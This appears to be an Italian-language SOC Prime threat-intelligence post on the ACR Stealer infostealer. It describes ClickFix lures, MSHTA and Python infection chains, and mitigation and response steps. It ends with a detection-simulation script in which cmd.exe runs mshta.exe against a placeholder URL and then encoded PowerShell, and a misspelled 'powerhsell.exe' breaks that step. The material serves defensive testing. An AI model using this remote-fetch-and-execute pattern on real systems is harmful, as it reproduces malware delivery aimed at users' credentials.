SOC Prime Bias: Alto

20 Jul 2026 06:25 UTC

ACR Stealer: Due catene di intrusione osservate durante l’aumento dell’attività di minaccia

Author Photo
SOC Prime Team linkedin icon Segui
ACR Stealer: Due catene di intrusione osservate durante l’aumento dell’attività di minaccia
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

ACR Stealer è una famiglia di malware specializzata nel furto di informazioni che utilizza tecniche di ingegneria sociale in stile ClickFix per colpire ambienti aziendali. Il malware opera attraverso due principali catene di infezione: una che si basa su payload consegnati tramite WebDAV con loader Python e un controllo e comando basato su blockchain, e un’altra che utilizza MSHTA con la consegna di payload tramite steganografia. Il suo obiettivo principale è rubare credenziali del browser, token di autenticazione e documenti sensibili.

Indagine

Microsoft Defender Experts ha osservato un aumento dell’attività tra la fine di aprile e metà giugno 2026. L’indagine ha identificato due percorsi di esecuzione separati: una campagna basata su disco che coinvolge Python e attività pianificate, e una campagna senza file che utilizza MSHTA ed esecuzioni di shellcode in memoria. Gli analisti hanno anche documentato metodi avanzati di evasione, tra cui timestomping, PowerShell offuscato e risolutori dead-drop supportati da blockchain.

Mitigazione

Le organizzazioni dovrebbero formare gli utenti a riconoscere i prompt ClickFix e limitare l’esecuzione di script non attendibili attraverso il controllo delle applicazioni. Ridurre l’esposizione al malvertising e applicare il filtraggio web può aiutare a interrompere i tentativi di accesso iniziale. Indurire i punti finali limitando la dipendenza da credenziali memorizzate nel browser e applicando l’autenticazione a più fattori è anche essenziale per ridurre il rischio di furto di credenziali.

Risposta

Se viene rilevata questa attività, i dispositivi interessati dovrebbero essere isolati immediatamente e tutte le credenziali e i token potenzialmente compromessi dovrebbero essere ruotati. I token di sessione dovrebbero essere revocati, e gli investigatori dovrebbero esaminare le connessioni in uscita verso condivisioni remote sospette o servizi di hosting di immagini. L’EDR in modalità blocco dovrebbe essere utilizzato per contenere la minaccia e rimuovere efficientemente gli artefatti dannosi.

Flusso di Attacco

Esecuzione di simulazione

Prerequisito: il controlli pre-volo di Telemetry & Baseline devono essere riusciti.

Motivazione: questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) destinata ad attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a errori di diagnosi.

  • Narrazione di attacco & Comandi: L’avversario prende di mira un utente con un falso “errore del browser” (ClickFix). Una volta che l’utente copia e incolla il comando in un terminale, cmd.exe viene invocato. Il comando istruisce mshta.exe a contattare un URL remoto per recuperare uno script dannoso. Per ulteriori evasioni del rilevamento tramite stringhe semplici, lo script utilizza powershell.exe con un comando codificato (-Enc) per scaricare ed eseguire il malware ACR Stealer in memoria, bypassando la tradizionale scansione basata su file.

  • Script di test regressione:

    # Simulazione della catena di ClickFix di ACR Stealer
    # Passo 1: Simulare il wrapper cmd.exe
    # Passo 2: Invo care mshta.exe con un URL
    # Passo 3: Seguito da un comando PowerShell codificato
    
    $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Write-Host 'Simulating ACR Stealer Payload Execution'"))
    
    Start-Process "cmd.exe" -ArgumentList "/c mshta.exe https://example.com/payload.hta & powerhsell.exe -Enc $encodedCommand"
  • Comandi di pulizia:

    # Non vengono creati file persistenti in questa simulazione, ma assicurarsi che non siano presenti processi orfani
    Stop-Process -Name "mshta" -ErrorAction SilentlyContinue
    Stop-Process -Name "powershell" -ErrorAction SilentlyContinue